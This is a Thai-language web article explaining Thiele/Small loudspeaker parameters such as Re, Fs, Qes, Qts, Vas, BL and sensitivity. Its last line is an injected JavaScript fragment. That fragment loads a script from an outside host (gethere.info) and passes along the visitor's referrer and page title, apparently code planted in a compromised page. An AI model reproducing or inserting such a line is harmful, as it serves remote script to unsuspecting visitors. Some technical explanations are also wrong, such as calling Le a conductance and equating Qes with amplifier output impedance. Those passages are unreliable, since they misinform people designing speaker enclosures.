รู้จักกับค่า T/S Parameter
คำว่า T/S นั้นย่อมาจากคำว่า Thiele/Small โดยความหมายแล้วก็คือกลุ่มค่าจำเพาะทางอีเล็กโทรนิคส์-กลศาสตร์ที่อธิบายถึงคุณภาพ และการตอบสนองความถี่ของลำโพงอย่างลึกซึ้ง…
ซึ่งค่าต่างๆเหล่านี้จะถูกระบุไว้ในสเป็กของลำโพง เพื่อเป็นแนวทางในการเลือกใช้งานในระบบ นอกจากนั้นยังสามารถที่จะนำมาใช้เพื่อวิเคราะห์ถึงระดับความเร็ว และอัตราเร่งในการเคลื่อนที่ของกรวยลำโพง รวมไปถึงคุณภาพของเสียงที่ลำโพงจะถ่ายทอดออกมาเมื่อถูกบรรจุอยู่ในตู้ในแบบ ต่างๆ และขนาดต่างๆกัน ซึ่งค่าพารามิเตอร์ที่มักจะพบบ่อยๆก็มีดังต่อไปนี้
- Re มีหน่วยเป็นโอห์ม หมายถึงค่าความต้านทานไฟฟ้ากระแสตรง (DC) ของขดลวดวอยซ์คอยล์ จากมาตรฐาน EIA กำหนดเอาไว้ว่า ค่า Re จะต้องมีค่าไม่น้อยกว่า 80% ของค่าอิมพิแดนซ์ลำโพงตัวนั้นๆ ดังนั้นเมื่อลำโพงมีอิมพิแดนซ์ 4 โอห์ม ก็จะมีค่า Re ได้น้อยสุด 3.2 โอห์ม
- Fs บางครั้งก็จะเป็นค่า Fo มีหน่วยเป็น Hz เป็นค่าความถี่ที่ระดับค่ามวลของชิ้นส่วนทุกชิ้นของลำโพง ที่ขยับตัวได้ และค่าที่ยอมรับได้จากการเคลื่อนที่ตัวของกรวยลำโพงในระดับเสริมกันสูงสุด ซึ่งหากมากไปกว่านี้ก็จะมีค่าความถี่เรโซแนนซ์ที่ลดลง และเกิดหักล้างกันขึ้น โดยทั่วไปแล้วการพยายามให้ลำโพงขับความถี่ที่ต่ำกว่าค่า Fs นี้ จะเป็นพลให้ประสิทธิภาพในด้านพลังเสียงลดลง อาจทำให้สูญเสียการควบคุมการเคลื่อนที่ของกรวยลำโพงได้ และเป็นเหตุให้ลำโพงเกิดความเสียงหาย ซึ่งโดยทั่วไปแล้วในลำโพงซับวูฟเฟอร์จะมีค่า Fs ประมาณ 13-60 Hz ส่วนลำโพงมิดเร้นจ์จะอยู่ในช่วง 60-500 Hz และลำโพงทวีตเตอร์จะอยู่ที่ 500 Hz – 4 kHz
- Qes เป็นค่าที่ระบุถึงความสามารถในการหยุดยั้งการเคลื่อนที่ของกรวยลำโพงในเชิงไฟฟ้า กล่าวคือ เมื่อขดลวดเคลื่อนตัวผ่านสนามแม่เหล็ก มันจะเกิดกระแสที่ตรงข้ามกับการเคลื่อนที่ของกรวยที่เรียกว่า Back – EMS โดยมันจะลดกระแสทั้งหมดที่ผ่านเข้าไปในขดลวดที่ระดับความถี่เรโซแนนซ์ หรือระดับ Fs และจะลดความสามารถในการเคลื่อนที่ของกรวยลำโพง โดยทั่วไปนั้นค่า Qes ที่ว่านี้จะมีค่าตรงกับอิมพิแดนซ์ขาออกของเพาเวอร์แอมป์
- Qms เป็นค่าที่ระบุถึงความสามารถในการหยุดยั้งการเคลื่อนที่ของกรวยลำโพงในเชิงกล ซึ่งหมายถึงการสูญเสียงการควบคุมการเคลื่อนตัวของสไปเดอร์ และเซอร์ราวด์ด้วย โดยทั่วไปแล้วค่า Qms จะอู่ที่ประมาณ 3 ยิ่งถ้าค่า Qms มีมากเท่าไร ก็แปลว่าค่า Damping ก็จะมีน้อยลงตามไปด้วย นอกจากนั้นค่า Qms ยังมีอิทธิพลต่อค่าอิมพิแดนซ์อีกด้วย กล่าวคือยิ่งค่า Qms มีมากขึ้น ค่าอิมพิแดนซ์สูงมากขึ้นด้วยเช่นกัน
- Qts เป็นค่าที่ระบุถึงการร่วมกันระหว่างความสามารถในการหยุดยั้งการเคลื่อนที่ของกรวยลำโพง (Damping) ทั้งในเชิงไฟฟ้า และเชิงกล โดยในทางไฟฟ้านั้นค่า Q จะแปรผกผันกับ Damping ของมัน ซึ่งค่า Qts จะเป็นสัดส่วนของพลังงานที่สะสมไว้ หารด้วยพลังงานที่ถูกปล่อยออกไปที่ความถี่ Fc ซึ่งลำโพงเกือบมั้งหมดจะมีค่า Qts อยู่ในช่วง 0.2-0.8
- Le จะมีหน่วยเป็น mH จะแสดงถึงค่าการนำไฟฟ้าของขดลวดวอยซ์คอยล์ ซึ่งจะเปลี่ยนแปลงไปตามความถี่ด้วย นั่นก็หมายความว่าถ้ามีค่า Le ที่มาก มันก็จะไปจำกัดการถ่ายทอดความถี่สูงของลำโพง และจะทำให้การตอบสนองความถี่เปลี่ยนแปลงไปใกล้จุดที่เรียกว่า Cut-Off ซึ่งในพวกโปรแกรมออกแบบตู้ลำโพงแบบง่ายๆมักจะละเลยในเรื่องของค่า Le นี้ไป จึงทำให้ตู้ลำโพงที่ว่าไม่อาจทำงานกับลำโพงได้อย่างเต็มประสิทธิภาพ
- Sd หมายถึงพื้นที่หน้าตัดจริงของกรวยลำโพง มีหน่วยเป็น ตร. เมตร ที่จะแปรผันไปตามลักษณะ การออกแบบ และรูปร่างของขอบเซอร์ราวด์ โดยปกติแล้วจะคำนวณมาจากค่าเส้นผ่าศูนย์กลางแล้วบวกด้วยครึ่งหนึ่งของความ กว้างเซอร์ราวด์ ซึ่งจะเห็นได้ว่าในลำโพงที่มีขอบเซอร์ราวด์ขนาดใหญ่ มักจะมีค่า Sd ที่น้อยกว่าลำโพงในแบบทั่วๆไป
- Vas จะมีหน่วยเป็นลิตร หรือ ลบ. เมตร คือค่าของปริมาณอากาศที่มีผลเท่ากับค่าความสามารถในการยับยั้งการเคลื่อนที่ของกรวยลำโพงเมื่อติดตั้งอยู่ในลักษณะแขวนลอย นั่นก็คือ ถ้าค่า Vas มี มากก็แสดงว่าลำโพงตัวนั้นๆมีความสามารถในการยับยั้งที่น้อย ซึ่งก็หมายความว่าลำโพงตัวนั้นมีความต้องการปริมาตรตู้ที่มาก หรือต้องการตู้ที่มีขนาดใหญ่ ซึ่งค่า Vas นี้จะมีความผันแปรตามเส้นผ่าศูนย์กลางของลำโพง
- BL หมายถึงแรงผลัก (Force Factor) เพราะว่าแรงผลักบนวอยซ์คอยล์ที่มาจากแม่เหล็กของลำโพง จะเสริมค่ากระแสเข้าไปในวอยซ์คอยล์ด้วย ยิ่งค่า BL มีมาก แรงผลักบนวอยซ์คอยล์ก็จะมากขึ้นตามไปด้วย และค่า BL นี้จะมีผลเป็นอย่างมากต่อค่า Qes
- Mms มีหน่วยวัดเป็นกรัม หรือกิโลกรัม เป็นค่ามวลรวมของกรวยลำโพง, วอยซ์คอยล์ และส่วนประกอบทั้งหมดของตัวลำโพงที่เคลื่อนตัวได้ รวมถึงภาระทางอคูสติคที่กำหนดโดยมวลอากาศเวลาสัมผัสหน้ากรวย
- Cms มีหน่วยวัดเป็น m/N จะเป็นตัวที่บ่งบอกถึงความยินยอมของอุปกรณ์ภายในภาค Suspension ที่มีความหมายตรงกันข้ามกับการยับยั้ง และลำโพงใดที่มีค่า Cms มาก ก็จะมีค่า Vas ที่มากตามไปด้วย
- Efficiency มีหน่วยเป็น % ใช้เป็นค่าเปรียบเทียบถึงประสิทธิภาพของลำโพงแต่ละตัว ซึ่งมีประโยชน์มากกว่าใช้ค่าความไว (Sensitivity)
- Sensitivity หมายถึงแรงผลักอากาศที่ลำโพงนั้นทำได้ภายใต้เงื่อนไขที่กำหนด มีหน่วยวัดเป็น dB ซึ่งโดยมากมักจะกำหนดด้วยการป้อนกำลังขับ 1 วัตต์ และทำการวัดค่า SPL ที่ระยะห่าง 1 เมตร
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;